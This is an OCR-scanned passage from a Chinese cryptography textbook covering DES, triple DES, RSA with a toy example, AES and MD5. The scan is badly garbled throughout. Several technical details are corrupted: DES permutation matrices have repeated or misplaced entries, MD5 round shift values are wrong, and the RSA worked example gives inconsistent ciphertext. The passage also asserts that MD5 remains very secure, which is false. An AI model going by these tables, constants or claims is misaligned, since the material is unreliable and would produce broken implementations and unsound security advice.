制 基于 尖端 的 数学 难题 ,计算 非常 复杂 ,安全 性 高 ,但 实现 速度 却 远 远 赶不上 对 称 密码 体制 。 
因而 非 对 称 密码 体制 通常 用 来 加 密 关键 性 的 、 核 心 的 机 密 数据 ,而 对 称 密码 体制 通常 用 来 加 
密 大 量 的 数据 。 对 于 具有 大 存储 量 的 图 像 来 说 ,结合 对 称 密码 体制 的 加 密 方案 将 是 科学 的 、 
实用 的 。 


3.3.3 DES 算法 


DES 即 数据 加 密 标 准 , 最 初 是 IBM 的 W. Tuchman 和 C. Meyers 等 人 提出 的 一 个 数据 
加 密 算法 Lucifef, 它 于 1976 年 被 美国 国家 标准 局 正式 用 于 商业 和 政府 非 要 害 信息 的 加 密 。 
DES 是 典型 的 加 解密 钥 相同 的 对 称 密码 体制 ,其 优势 在 于 加 解密 速度 快 ,算法 易 实 现 , 安 全 
性 好 。 目 前 在 我 国 国内 , 随 着 三 金工 程 (尤其 是 金 卡 工程 ) 的 启动 ,DES 算法 在 PQS, ATM, 
磁卡 及 智能 卡 (IC 卡 )、 加 油 站 、 高 速 公路 收费 站 等 领域 被 广泛 应 用 ,以 此 来 实现 关键 数据 的 
保密 ,如 信用 卡 持 卡 人 的 PIN 加 密 传输 、IC 卡 与 PQS 间 的 双向 认证 ,金融 交易 数据 包 的 
MAC 校 验 等 , 均 用 到 DES 算法 。 

DES 是 分 组 加 密 算法 , 它 以 64 位 (二 进 制 ) 为 一 组 对 数据 加 密 ,64 位 明文 输入 ,64 位 密 
文 输出 。 密 钥 长 度 为 56 位 ,但 密 钥 通常 表示 为 64 位 ,并 分 为 8 组 每 组 第 8 位 作为 奇偶 校 验 
位 ,以 确保 密 钥 的 正确 性 。 


1. 基于 DES 算法 的 数字 图 像 加 密 

将 DES 算法 用 于 数字 图 像 加 密 , 可 以 考虑 将 图 像 色彩 的 二 维 数据 转化 为 一 维 数据 ,对 
一 维 数据 按 64 位 为 一 组 进行 分 组 加 密 。 

2. DES 算法 概要 

(1) 对 输入 的 明文 从 右 向 左 按 顺 序 每 64 位 分 为 一 组 (不 足 64 位 时 在 高 位 补 0) ,并 按 组 
进行 加 密 或 解密 。 

(2) 进行 初始 置换 。 


(3) 将 置换 后 的 明文 分 成 左右 两 组 ,每 组 32 位 。 
CD 进行 16 轮 相 同 的 变换 ,包括 密 钥 变换 ,每 轮 变 换 如 图 3-3 所 示 。 


实践 
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图 3-3 一 轮 DES 变换 


3. DES 算法 加 密 过 程 


1) 初始 置换 
初始 置换 就 是 按照 矩阵 3-1 的 规则 对 输入 的 64 位 二 进 制 明文 P= P1P2-- P64 改变 顺 
序 ,矩阵 中 的 数字 代表 明文 在 64 位 二 进 制 序列 中 的 位 置 。 
矩阵 3-1 初始 置换 
58 50 42 34 26 18 10 2 
60 52 44 36 28 20 12 4 
62 54 46 38 30 22 14 6 
64 56 48 40 32 24 16 8 
57 49 41 33 25 17 9 1 
59 51 43 35 27 19 11 3 
61 53 45 37 29 21 13 5 
63 55 47 39 31 23 15 7 
初始 置换 矩阵 有 8 行 8 列 , 共 64 个 元 素 ,其 元 素 的 排列 是 有 规律 的 ,可 以 把 上 面 4 行 和 
下 面 4 行 分 成 2 组 , 取 名 为 L 和 R。 
2) 明文 分 组 
将 置换 后 的 明文 , 即 新 的 64 位 二 进 制 序列 , 按 顺序 分 为 左 、 右 两 组 ,每 组 都 是 32 位 。 


3) 密 钥 置换 
密 钥 置换 就 是 按 矩 阵 3-2 的 规则 改变 密 钥 的 顺序 。 
矩阵 3-2” 密 钥 置换 
57 49 41 33 25 17 9 
1 58 50 42 34 26 18 
10 2 59 51 43 35 27 
19 11 3 60 52 44 36 
63 55 47 39 31 23 15 
7 62 54 46 38 20 22 
14 6 54 46 45 37 29 
21 13 5 28 20 12 4 
密 钥 置换 矩阵 有 8 行 7 列 , 共 56 个 元 素 。 其 元 素 的 排列 是 有 规律 的 ,可 以 把 上 面 4 行 
和 下 面 4 行 分 为 2 组 , 取 名 为 KL、KR, 由 于 取消 了 原 64 位 密 钥 中 的 奇偶 校 验 位 ,所 以 密 铀 
置换 矩阵 3-2 中 不 会 出 现 8.16.24.32.40.48.56.64 这 些 数值 。 
4) 密 钥 分 组 、 移 位 、 合 
将 置换 后 的 56 位 密 钥 按 顺 序 分 成 左右 两 个 部 分 KL KR ,每 部 分 27 位 ,根据 DES 算法 
4E GE FUCO ,分 别 将 两 个 部 分 KL、KR 循环 左 移 1 位 或 2 位 ,每 轮 循环 左 移 位 数 按照 密 
钥 移 位 个 数 而 定 ,如 表 3-2 所 示 。 
表 3-2 每 轮 密 钥 循环 左 移 位 数 
迭代 次 数 | 1 2 113 | 3 S8 7.8/|910/|11|12|13| M | 15 | 16 


右 移 位 数 | 1 1 2 2 2 2 2 2 ? 2 2 2 2 2 2 1 


例如 ,KL0 二 clc2…c28,KR0 二 dld2…d28, 由 于 是 第 1 次 迭代 ,循环 左 移 位 数 是 1, 所 
以 ,KL0==c2c3…c28cl,KR0 二 d2d3…d28d1; KLKR 两 组 密 钥 循环 左 移 后 ,再 合并 成 56 位 
密 钥 ,例如 K1 一 c2c3…c28cl1d2d3…d28dl ,合并 后 56 位 密 钥 一 方面 用 于 产生 子 密 钥 , 另 一 
方面 为 下 次 迭代 运算 做 准备 。 
5) 压缩 置换 
按照 密 钥 压 缩 置换 矩阵 3-3, 从 56 位 密 钥 中 产生 48 位 子 密 钥 。 密 钥 奈 缩 置换 矩阵 中 共 
有 48 位 元 素 , 其 中 看 不 到 9.18.22.25.35.38.43.54 这 8 个 元 素 , 因 为 这 些 元 素 已 被 压 
缩 了 。 
和 矩阵 3-3 HEN 
14 17 H 24 1 5 
3 28 15 6 21 10 
23 19 12 4 26 
16 7 27 20 13 
41 52 31 37 47 55 
30 40 51 45 33 48 
44 49 39 56 34 53 
46 42 50 36 29 32 


to œ 


实践 


6) 扩展 置换 
将 原 明文 数据 的 右 半 部 分 R 从 32 位 扩展 成 48 位 ,扩展 置换 按照 扩展 置换 矩阵 3-4 规 
则 进行 。 
和 矩阵 3-4 扩展 置换 


28 29 30 31 32 1 
7) 子 密 钥 和 扩展 置换 后 的 数据 异 或 运算 
将 子 密 钥 和 扩展 置换 后 的 数据 按 位 进行 异 或 运算 ,然后 ,将 得 到 的 48 位 结果 送 到 S dre. 
8) S 盒 蔡 换 
将 A8 位 数据 按 顺 序 每 6 位 分 为 一 组 , 共 分 成 8 组 ,分 别 输入 ST,S2-- S8 @& rh , g S & 
的 输出 为 4 位 ,再 将 每 个 S 盒 的 输出 拼接 成 32 位 ,S 盒 ,结构 如 图 3-4 所 示 。 
j asia DES 的 S 盒 的 使 用 方法 是 , 设 S xl AO 6 位 二 进 
制 数 blb2b3b4b5b6, 把 b1, b6 两 位 二 进 制 数 转换 成 十 进 
制 , 并 作为 S 盒 的 行 号 i 把 b2、b3、b4、b5 这 4 位 二 进 制 数 
转换 成 十 进 制 数 ,并 作为 S 盒 的 列 号 j, 则 对 应 S SO CE 
32 位 输出 元 素 就 为 S 盒 的 十 进 制 输出 ,再 将 该 十 进 制 数 转换 为 二 进 
图 3-4 SÉ 制 数 ,就 得 到 S 盒 的 4 位 二 进 制 输出 。 
S 盒 替换 是 DES 的 核心 部 分 ,整个 变换 过 程 是 非 线 性 
的 (而 DES 算法 的 其 他 变换 都 是 线性 的 ) ,提供 了 很 好 的 混乱 数据 效果 , 比 DES 算法 其 他 步 
又 提供 的 安全 性 更 好 。 
9) P f FETA 
将 S 盒 输出 的 32 位 二 进 制 数据 按 P 盒 置 换 矩 阵 3-5 进行 置换 。 
和 矩阵 3-5 PARKERE 
16 7 20 21 29 12 28 17 
1 15 23 26 5 28 31 10 
2 8 24 14 32 27 3 9 
19 13 30 6 22 11 4 25 
例如 将 S 盒 输出 的 第 16 位 变换 成 第 1 位 ,S 盒 输出 的 第 1 位 变换 成 第 9 位 。 
100 P 盒 输出 与 原 64 位 数据 进行 异 或 运算 
将 了 盒 输出 的 32 位 二 进 制 与 原 64 位 数据 分 组 的 左 半 部 分 Li 进行 异 或 运算 ,得 到 分 组 
的 右 半 部 分 Ri。 
1D Ri--Li 
将 原 分 组 的 右 半 部 分 Ri 一 1 作为 分 组 的 左 半 部 分 Li。 


12) 循环 
重复 4) 一 11) 步 ,循环 操作 16 轮 。 
13) 道 初始 置换 
经 过 16 轮 的 DES 运算 后 ,将 输出 的 L16、R16 合并 起 来 ,形成 64 位 的 二 进 制 数 ,最 后 
按照 逆 初 始 置 换 和 矩阵 3-6 进行 逆 初 始 置 换 , 就 可 以 得 到 密 文 。 
JERE 3-6” 道 初 始 置 换 


40 8 48 16 56 24 64 32 
39 7 47 15 55 23 63 31 
38 6 46 14 54 22 62 30 
37 5 45 13 53 21 61 29 
36 4 44 12 52 20 60 28 
35 3 43 11 51 19 59 27 
34 2 42 10 50 18 58 26 
33 1 41 9 49 17 57 25 


4. DES 算法 解密 过 程 


DES 算法 加 密 和 解密 过 程 使 用 相同 的 算法 ,并 使 用 相同 的 加 密 密 钥 和 解密 密 钥 , 两 者 
的 区 别 如 下 。 

(1) DES 加 密 时 是 从 L0、R0 到 L15、R15 进行 变换 ,而 解密 时 是 从 L15、R15 到 L0 .R0 
进行 变换 的 。 

(2) 加 密 时 各 轮 的 加 密 密 钥 为 K0、K1、…、K15, 而 解密 时 各 轮 的 解密 密 钥 为 K15、 
K14.---.K0, 

(3) 加 密 时 密 钥 循环 左 移 , 而 解密 时 循环 右 移 。 


5. 三 重 DES 算法 


三 重 DES 加 密 的 基本 方法 是 用 两 个 密 钥 对 一 个 分 组 进行 三 次 加 密 , 即 加 密 时 , 先 用 第 
一 个 密 钥 加 密 ,然后 用 第 二 个 密 钥 解密 ,最 后 再 用 第 三 个 密 钥 加 密 。 解 密 时 , 先 用 第 一 个 密 
钥 解 密 ,然后 用 第 二 个 密 钥 加 密 , 最 后 再 用 第 三 个 密 钥 解 密 ,过 程 示 意 如 图 3-5 所 示 。 
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图 3-5 =Æ DES 算法 


实践 


3.3.4 RSA 公开 密 钥 密码 体制 


RSA 是 第 一 个 比较 完善 的 公开 密 钥 算 法 , 它 既 能 用 于 加 密 , 也 能 用 于 数字 签名 。RSA 
以 它 的 3 个 发 明 者 Ron Rivest, Adi Shamir, Leonard Adleman 的 名 字 首 字母 命名 ， 

根据 数论 寻求 两 个 大 素数 比较 简单 ,而 把 两 个 大 素数 的 乘积 分 解 则 极其 困难 。 在 这 一 
体制 中 ,每 个 用 户 有 两 个 密 钥 , 即 加 密 密 钥 pk= (Cen) 和 解密 密 钥 sk= (d.n). HIP UU 
密 钥 公开 ,使 得 任何 其 他 用 户 都 可 以 使 用 ; 而 对 解密 密 钥 中 的 d 则 保密 。 

这 里 ,n 为 两 个 大 素数 p Ma 的 乘积 (素数 p 和 g 一 般 为 100 位 以 上 的 十 进 制 数 ) e 和 
d 满足 一 定 的 关系 , 当 敌 手 已 知 e An 时 并 不 能 求 出 d。 


1. 加 密 算法 


若 用 整数 X 表示 明文 ,用 整数 了 表示 密 文 (X 和 YY 均 小 于 nn), 则 加 密 和 解密 的 公式 如 
表 3-3 所 示 。 
表 3-3 ”加密 和 解密 公式 

nn: 两 素数 p 和 g 的 乘积 (p 和 g 必须 保密 ); 


AN 
HEU eiG-—DG-D EJ 
3458 KR die^! (mod (p—1)(q—1)) 
加 密 C=m mod n 
解密 m-—c! mod n 

2. 密 钥 的 产生 


(1) 选择 一 对 不 同 的 .足够 大 的 素数 和 g ,计算 n. 

用 户 秘密 地 选择 两 个 大 素数 p 和 qd ,计算 出 n— pq.n RI RSA 算法 的 模 数 ,明文 必须 
用 小 于 的 数 来 表示 ,实际 上 nn 是 几 百 比特 长 的 数 。 加 密 消 息 m 时 ,首先 将 它 分 成 比 n 小 
的 数据 分 组 (采用 十 六 进 制 数 ,选取 小 于 的 16 f di A CORO ,也 就 是 说 ,如 果 p 和 g 为 100 
位 的 素数 ,那么 nn 将 有 200 位 ,每 个 消息 分 组 m 应 小 于 200 位 长 (如 果 需 要 加 密 固 定 的 消息 
分 组 ,那么 可 以 在 它 的 左边 填充 一 些 0 并 确保 该 数 比 n 小 )。 加 密 后 的 密 文 c, 将 由 相同 长 
度 的 分 组 c, 组 成 。 加 密 公 式 简 化 如 下 : 


c; = mí (mod n) (3-D 

解密 时 , 取 每 一 个 加 密 后 的 分 组 c; 并 计算 m ,公式 如 下 : 
m; = cf (mod n) (3-2) 

(2) 计算 性 (2z) , 即 再 计算 出 的 欧 拉 函数 ,如 公式 (3-3): 
E (m) = (p—1) * (q—1). Z G) (3-3) 


(3) 选择 e. MO G- G0 — 1] P3 FE— P 53 Z (n) 8:3 TIC e 作为 公开 的 加 密 指数 。 
(4) 计算 a ,计算 出 满足 公式 (3-4) 的 d ied —1 mod Z (n) 作为 解密 指数 。 
d = e? mod ((p — D(q—1)) (3-4) 


(5) 得 出 所 需要 的 公开 密 钥 和 私有 密 钥 , 如 下 。 

* 公开 密 钥 〈 即 加 密 密 钥 ) : pk= le.d). 

。 私有 密 钥 〈 即 解密 密 钥 ) : s= (d.n). 

【实例 3-1] 假设 用 户 A 需要 将 明文 key 通过 RSA 加 密 后 传递 给 用 户 B, 过 程 如 下 。 

A) 设计 公私 密 钥 (e,n) 和 (d,n)。 

令 p=3,g=11, 得 出 n=pXg=3X11=33; f(n)=(p—1)(q—1)=2X10=20; J e 
3,(3 5j 20 互 质 ) 则 eXxd 三 1 mod f(n), E 3Xd=1 mod 20, d 取 值 可 以 用 试 算 的 办 法 来 寻 
找 , 试 算 结 果 如 表 3-4 所 示 。 


表 3-4 计算 结果 
d eXd—3X4d CeXd) mod (p—1)(q—1) — (3X d) mod 20 
1 3 3 
2 6 6 
3 9 9 
4 12 12 
5 15 15 
6 18 18 
7 21 1 
8 24 3 
9 27 6 


通过 试 算 找 到 , 当 d=7 时 ,eXd=1l mod f/(n) 同 余 等 式 成 立 。 因 此 ,可 令 d= 二 7。 从 而 
可 以 设计 出 一 对 公私 密 钥 , 加 密 密 钥 ( 公 钥 ) 为 KU = (e,n) 二 (3,33), 解 密 密 钥 ( 私 钥 ) 为 
KR =(d,n)=(7,33), 

(2) 英文 数字 化 。 

将 明文 信息 数字 化 ,并 将 每 块 两 个 数字 分 组 .假定 明文 英文 字母 编码 表 为 按 字母 顺序 
排列 数值 ,如 表 3-5 所 示 , 则 得 到 分 组 后 的 key 的 明文 信息 为 11.05、25。 

表 3-5 ”英文 字母 编码 表 

字母 a b € d e f g h š j k 1 m 


码 值 o 02 03 04 05 06 07 08 09 10 11 12 13 


字母 n o p q r s t u v w x y z 


码 值 14 15 16 17 18 19 20 21 22 23 24 25 26 


(3) 明文 加 密 。 
用 户 利用 加 密 密 钥 (3,33) 将 数字 化 明文 分 组 信息 加 密 成 密 文 。 由 c m* (mod nn) 得 
mi ma 和 ms 如 下 。 
mi== (ci )4 (mod n)=11’ (mod 33)=11 
m3 (c5 )* (mod n) —31? (mod 33) =05 
ma Cc4)* (mod n) —16/ (mod 33) —25 
因此 ,可 得 到 相应 的 密 文 信息 为 11、05、25。 


实践 


(4) 密 文 解密 。 

用 户 B 收 到 密 文 , 若 将 其 解密 ,只 需要 计算 m==c (mod n) , 即 有 如 下 结果 。 
mm 二 (ci) (mod i) — 11! (mod 33)=11 
m3 7 Cc3)* (mod n)=31’ (mod 33)=05 
ms== (cs) (mod n) =16! (mod 33)=25 

可 知 用 户 B 8 9J C EON 11.05.25, dis E ñ 093480 36 Hc AE, BI np 49 33] 
恢复 后 的 原文 “key”。 

由 于 RSA 算法 的 公 钥 私 钥 的 长 度 ( 模 长 度 ) 要 到 1024 位 甚至 2048 位 才能 保证 安全 , 因 
IE, p qse 的 选取 及 公 钥 私 钥 的 生成 .加密 解密 模 指 数 运算 都 有 一 定 的 计算 程序 ,需要 仰 仗 
计算 机 高 速 完成 。 

3. RSA 的 安全 性 


在 RSA 密码 应 用 中 , 公 钥 KU 是 被 公开 的 , 即 e 入 的 数值 可 以 被 第 三 方 穷 听 者 得 到 。 
破解 RSA 密码 的 问题 就 是 从 已 知 的 e 和 的 数值 (x 等 于 pq) 想法 求 出 4 的 数值 ,这 样 就 可 以 
得 到 私 钥 来 破解 密 文 。 从 公式 ; d =e (mod ((p 一 1)(g 一 1))) 或 de 二 1 (mod ((p 一 1) 
(g 一 1))) 可 以 看 出 ,密码 破解 的 实质 问题 是 从 pg 的 数值 求 出 (p 一 1) 和 (g 一 1)。 换 句 话 说 ， 
只 要 求 出 p 和 g 的 值 ,就 能 求 出 d 的 值 ,进而 得 到 私 钥 。 

"á p 和 4g 是 一 个 大 素数 的 时 候 , 从 它们 的 积 pg 去 分 解 因子 p 和 9g ,这 是 一 个 公认 的 数 
学 难题 。 比 如 当 pq 大 到 1024 位 时 ,迄今 为 止 还 没有 人 能 够 利用 任何 计算 工具 完成 分 解 因 
子 的 任务 。 因 此 ,RSA 从 提出 到 现在 已 近 20 年 ,经 历 了 各 种 攻击 的 考验 ,逐渐 为 人 们 接受 ， 
普遍 认为 是 目前 最 优秀 的 公 钥 方案 之 一 。 

然而 ,虽然 RSA 的 安全 性 依赖 于 大 数 的 因子 分 解 , 但 并 没有 从 理论 上 证 明 破译 RSA 的 
难度 与 大 数 分 解难 度 等 价 。 即 RSA 的 重大 缺陷 是 无 法 从 理论 上 把 握 它 的 保密 性 能 如 何 。 

此 外 ,RSA 的 缺点 还 有 两 个 方面 ,一 是 产生 密 钥 很 麻烦 ,受到 素数 产生 技术 的 限制 , 因 
而 难以 做 到 一 次 一 密 。 二 是 分 组 长 度 太 大 ,为 保证 安全 性 ,n 至 少 也 要 600 位 以 上 ,使 得 运 
算 代价 很 高 ,尤其 是 速度 较 慢 , 较 对 称 密码 算法 慢 几 个 数量 级 ; 且 随 着 大 数 分 解 技 术 的 发 
展 ,这 个 长 度 还 在 增加 ,不 利于 数据 格式 的 标准 化 。 因 此 ,使 用 RSA 只 能 加 密 少量 数据 ,大 
量 的 数据 加 密 还 要 靠 对 称 密码 算法 。 


3.3.5 AES 简介 


NIST(National Institute of Standards and Technology) 于 1999 年 发 布 了 一 个 新 版 本 
的 DES 标准 ,该 标准 指出 DES 仅 能 用 于 遗留 的 系统 ,同时 ,3DES 将 取代 DES 成 为 新 的 标 
准 。 然 而 ,3DES 的 根本 缺点 在 于 用 软件 实现 该 算法 的 速度 比较 慢 。3DES 中 轮 的 数量 三 售 
+ DES 中 轮 的 数量 , 故 其 速度 慢 得 多 。 另 外 ,DES 和 3DES 的 分 组 长 度 均 为 64 位 ,就 效率 
和 安全 性 而 言 ,分 组 长 度 应 该 更 长 。 

2000 年 10 月 ,美国 国家 标准 和 技术 协会 宣布 从 15 种 候选 算法 中 选取 出 Rijndael 算法 
作为 新 的 对 称 加 密 算法 标准 , 称 为 AES。AES 算法 的 加 密 、 解 密 流 程 图 如 图 3-6 所 示 。 

可 见 , 在 解密 时 ,只 需 将 所 有 操作 的 逆 变 换 逆序 进行 ,并 逆序 使 用 密 钥 编排 方案 即 可 。 


而 AES 算法 有 其 特殊 性 , 即 解密 本 质 上 和 加 密 有 相同 的 结构 ,因而 存在 “等 价 逆 密 码 ”。 这 
个 “等 价 道 密码 ”能 通过 原 变 换 的 一 系列 着 变换 来 实现 AES 算法 的 解答 ,这 些 逆 变换 按 与 
AES 算法 加 密 相同 的 顺序 进行 。 只 是 密 钥 扩 展 有 所 不 同 , 即 先 应 用 原 密 钥 扩展 ,再 将 
InvMixColumns 应 用 到 除 第 1 轮 和 最 后 一 轮 外 的 所 有 轮 密 钥 上 。 此 解密 算法 称 为 直接 解 
密 算法 。 在 这 个 算法 中 ,不 仅 步骤 本 身 与 加 密 不 同 ,而且 步骤 出 现 的 顺序 也 不 相同 。 为 了 便 
于 实现 ,通常 将 唯一 的 非 线性 步骤 (SubBytes) 放 在 轮 变换 的 第 1 步 。Rijndael 的 结构 使 得 
有 可 能 定义 一 个 等 价 的 解密 算法 ,其 中 所 使 用 的 步骤 次 序 与 加 密 相同 ,只 是 将 每 一 步 改 成 它 
Tg xc ,并 改变 密 钥 编排 方案 。 
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图 3-6 AES 算法 加 密 解密 流程 图 


3.3.6 MD5 


MD5(Message-Digest Algorithm 5 .信息 -摘要 算法 ) 是 由 MD2、MD3、MD4 发 展 而 来 的 
一 种 单 向 函数 算法 (也 就 是 Hash 算法 ) , 它 是 国际 著名 的 公 钥 加 密 算法 标准 RSA 的 第 一 设 
计 者 R. Rivest 于 20 世纪 90 年 代 初 开发 出 来 的 。MD5 的 最 大 作用 在 于 将 不 同 格式 的 大 容 
量 文件 信息 在 用 数字 签名 软件 来 签署 私人 密 钥 前 “压缩 "成 一 种 保密 的 格式 ,关键 之 处 在 于 
这 种 “压缩 "是 不 可 北 的 。 

MD5 可 以 为 任何 文件 (不 管 其 大 小 、 格 式 、 数 量 ) 产 生 一 个 独一无二 的 “数字 指纹 ”, 如 果 
任何 人 对 文件 做 了 任何 改动 ,其 MD5 值 也 就 是 对 应 的 “数字 指纹 ”都 会 发 生变 化 。 

MD5 的 典型 应 用 是 对 一 段 Message PW 077 fingerprint GE) ,以 防止 被 * 算 改 ”。 


实践 


比如 对 某 个 文件 产生 一 个 MD5 的 值 并 记录 在 案 , 然 后 传播 这 个 文件 ,如 果 有 人 修改 了 文件 
中 的 任何 内 容 , 对 这 个 文件 重新 计算 MD5 时 就 会 发 现 两 个 MD5 值 不 相同 。 如 果 再 有 一 个 
第 三 方 的 认证 机 构 , 用 MD5 还 可 以 防止 文件 作者 的 “抵赖 ”, 这 就 是 所 谓 的 数字 签名 应 用 。 

MD5 还 广泛 用 于 加 密 和 解密 技术 ,在 很 多 操作 系统 中 ,用 户 的 密码 是 以 MD5 值 (或 类 
似 的 其 他 算法 ) 的 方式 保存 的 ,用 户 登 录 的 时 候 ,系统 是 把 用 户 输入 的 密码 计算 成 MD5 值 ， 
然后 再 去 和 系统 中 保存 的 MD5 值 进行 比较 ,而 系统 并 不 “知道 "用户 的 密码 是 什么 。 

根据 密码 学 的 定义 ,如 果 内 容 不 同 的 明文 通过 散 列 算法 得 出 的 结果 (密码 学 称 为 信息 摘 
要 ) 相 同 ,就 称 为 发 生 了 “碰撞 ”"。 因 为 MD5 值 可 以 由 任意 长 度 的 字符 计算 出 来 ,所 以 可 以 
把 一 篇 文章 或 者 一 个 软件 的 所 有 字 节 进行 MD5 运算 得 出 一 个 数值 ,如 果 这 篇 文章 或 软件 
的 数据 改动 了 ,那么 再 计算 出 的 MD5 值 也 会 产生 变化 ,这 种 方法 常常 用 作 数 字 签名 校 验 。 
因为 明文 的 长 度 可 以 大 于 MD5 值 的 长 度 , 所 以 可 能 会 有 多 个 明文 具有 相同 的 MD5 值 ,如 
果 找 到 了 两 个 相同 MD5 值 的 明文 ,那么 就 是 找到 了 MD5 的 “碰撞 ”。 

散 列 算法 的 碰撞 分 为 两 种 , 即 强 无 碰撞 和 弱 无 碰撞 。 已 知 某 MD5 值 ,假如 能 够 找 出 某 
个 单词 , 它 的 MD5 值 和 已 知 的 某 MD5 值 一 致 ,那么 就 找到 了 MD5 的 “ 弱 无 碰撞 ”, 其 实 这 
就 意味 着 已 经 破解 了 MD5。 如 果 不 给 指定 的 MD5 值 ,随便 去 找 任意 两 个 相同 MDS 值 的 明 
文 , 即 找 强 无 碰撞 ,显然 要 相对 容易 些 了 ,但 对 于 好 的 散 列 算法 来 说 ,做 到 这 一 点 也 很 不 容易 
了 。 现 在 的 电脑 大 约 一 两 个 小 时 就 可 以 找到 一 对 碰撞 。 找 到 强 无 碰撞 在 实际 破解 中 没有 什 
么 真正 的 用 途 , 所 以 现在 MD5 仍然 是 很 安全 的 。 

实现 MD5 算法 主要 经 过 以 下 5 个 步骤 。 


1. 补 位 


补 位 的 目标 是 使 输入 的 消息 长 度 , 从 任意 值 变 成 一 个 新 的 长 度 n, E4 n= 448 Cmod 
512), 即 通过 补 位 使 消息 长 度 差 64 位 成 为 512 的 整数 倍 ,即使 原 消 息 的 长 度 正 好 满足 要 求 ， 
也 需要 进行 补 位 。 补 位 的 补丁 包括 一 个 1, 剩 下 的 全 是 0, 在 原 消息 之 后 。 特 别 地 ,如 果 原 消 
息 的 长 度 正 好 满足 要 求 , 则 补 位 包括 一 个 1 和 512 个 0。 


2. 追加 长 度 


在 追加 长 度 前 ,通过 补 位 ,消息 长 度 已 经 变 成 模 512 余 448, 接 下 来 的 追加 长 度 将 在 消 
息 后 继续 补充 64 位 的 信息 ,新 消息 将 是 512 的 整数 倍 。 追 加 长 度 的 信息 由 64 位 表示 ,被 追 
加 到 已 补 的 信息 后 ,如 果 原 消息 长 度 超过 64 位 ,只 使 用 低 64 位 。 追 加 的 长 度 是 原 消息 的 长 
度 ,而 不 是 补 位 后 的 信息 长 度 。 


3. 缓冲 区 初始 化 


为 了 计算 Hash 函数 的 结果 , 需 首 先 设置 128 位 的 缓冲 区 。 缓 冲 区 除 接受 Hash 函数 最 
终结 果 外 ,还 记录 中 间 结 果 。 

缓冲 区 分 成 4 等 份 , 即 4 个 32 位 寄存 器 (A,B.C,.D) ,每 个 32 位 寄存 器 称 为 字 , 如 图 3-7、 
图 3-8 所 示 。 

赋 初 值 A: 0x01234567,B: 0x89abcdef\C: Oxfedcba98,D: 0x76543210,ABCD 即 构成 
Buffer 0, 


Block n 


Buffer x+1 位 


图 3-7 缓冲 区 n>n+ 示意 图 图 3-8 四 轮 算法 


4. 消息 迭代 


从 Buffer 0 开始 进行 算法 的 主 循环 ,循环 的 次 数 是 消息 中 512 位 消息 分 组 的 数目 ,将 上 
面 4 个 变量 复制 到 另外 的 变量 中 : A 到 a,B 到 64,C 到 c.D 到 4d。 主 循环 有 4 轮 ,每 轮 很 相似 ， 
每 一 轮 进行 16 次 操作 ,每 次 操作 对 abc 和 4d 中 的 3 个 作 一 次 线性 函数 运算 ,然后 将 所 得 的 
结果 加 上 第 4 个 变量 ,文本 的 一 个 子 分 组 和 一 个 常数 ,再 将 所 得 的 结果 向 右 环 移 一 个 不 定 的 
数 , 最 后 用 该 结果 取代 a、bc 或 d 中 之 一 。 主 循环 的 运算 过 程 如 图 3-9 Bras o 


消息 分 组 


- 4 

=B 

TH f 
- [~D 


图 3-9 MDS 主 循环 


4 轮 运算 中 有 4 种 函数 ,分 别 为 F(X,Y,2Z)、G(X,Y,Z)、H(X,Y,Z) 和 I(X,Y,2)。 


F(X,Y,2) = (X and Y) or (not (X) and Z) 
G(X, Y, Z) = (X and Z) or (Y and not (Z)) 
H(X,Y,Z) = X xor Y xor Z 

I(X,Y,Z) = Y xor (X or not(Z)) 


这 些 函 数 是 这 样 设计 的 : 如 果 X.Y  Z 的 对 应 位 是 独立 和 均匀 的 ,那么 结果 的 每 一 位 
也 应 是 独立 和 均匀 的 。 函 数 F 是 按 逐 位 方式 操作 ,如 果 X, 那 么 了 ,否则 Z. A H ë 


实践 


位 奇偶 操作 符 。 
dt Mj 表示 消息 的 第 j 个 子 分 组 (从 0 到 15) ,二 二 一 s 表示 循环 左 移 s 位 , 则 操作 表达 
式 如 下 所 述 。 
FF(a,b,c,d,Mj,s,ti) 表 示 a=b+((at+(F(b,c,d) + Mj + ti)<<< s) 
GG(a,b,c,d,Mj,s,ti) 表 示 a=b+((a+ (G(b,c,d) + Mj + ti)<<<s) 
HH(a,b,c,d,Mj,s,ti) 表 示 a=b+((a+ (H(b,c,d) + Mj + ti)<<< s) 
II(ayb,c,d,Mj,s,ti) 表 示 a=b+((a+ (I(b,c,d) + Mj + ti)<<<s) 
这 四 轮 (64 步 ) 迭 代 过 程 分 别 如 下 所 述 。 
第 1 轮 : 


FF (a, b. c. d. M[ 0]. 11, 0xd76aa478); 
FF (d. a. b. c. M[ 1]. 12. 0xe8c7b756); 
FF (c, d, a, b, M[ 2]. 13. 0x242070db) ; 
FF (b, c. d. a. M[ 3]. 14, Oxclbdceee) ; 

FF (a, b. c. d. M[ 4]. 11. Oxf57cO0faD ; 

FF (d, a, b, c, M[ 5]. 12, 0x4787c622) ; 
FF (c, d, a. b, M[ 6]. 13. 0xa8304613); 
FF (b, c, d, a, M[ 7]. 14. 0xfd46950D ; 
FF (a. b. c, d. M[ 8]. 11. 0x698098d8)5 ; 
FF (d. a. b. c. M[ 9]. 12. 0x8b44f7aD ; 

FF (c, d, a. b. M[10]. 13. 0xffff5bb1); 

FF (b. c. d. a. M[11]. 14, 0x895cd7be) ; 
FF (a. b. c. d. M[12]. 11, 0x6b901122) ; 
FF (d. a. b. c. M[13]. 12, 0xfd987193); 
FF (c, d. a. b, M[14]. 13, 0xa679438e); 
FF (b. c. d. a, M[15]. 14, 0x49b40821); 


第 2 轮 : 


GG (a, b. c, d. M[ 1]. 21, 0xf61e2562); 
GG (d, a, b. c. M[ 6]. 22. 0xc040b340) ; 
GG (c. d. a. b. M[11]. 23. 0x265e5a51); 
GG (b. c. d. a. M[ 0]. 24. 0xe9b6c7aa) ; 
GG (a, b. c. d. M[ 5]. 21. Oxd62f105d); 
GG (d. a, b, c. M[10]. 22. | 0x2441453); 
GG (c, d, a. b. M[15]. 23. 0xd8ale681); 
GG (b. c. d, a. M[ 4]. 24. 0xe7d3fbc8); 
GG (a, b. c. d. M[ 9]. 21. Ox21elcde6); 
GG (d, a, b. c. M[14]. 22. 0xc33707d6) ; 
GG (c. d. a, b. M[ 3]. 23. Oxf4d50d87) ; 


第 3 轮 : 


第 4 轮 : 


GG (b. c, d. a. M[ 8]. 24. 0x455al4ed); 
GG (a. b. c, d. M[13]. 21. 0xa9e3e905); 
GG (d, a. b. c. M[ 2]. 22. Oxfcefa3f8) ; 

GG (c, d, a, b. M[ 7]. 23. 0x676f02d9); 
GG (b, c. d. a. M[12]. 24, 0x8d2a4c8a) ; 
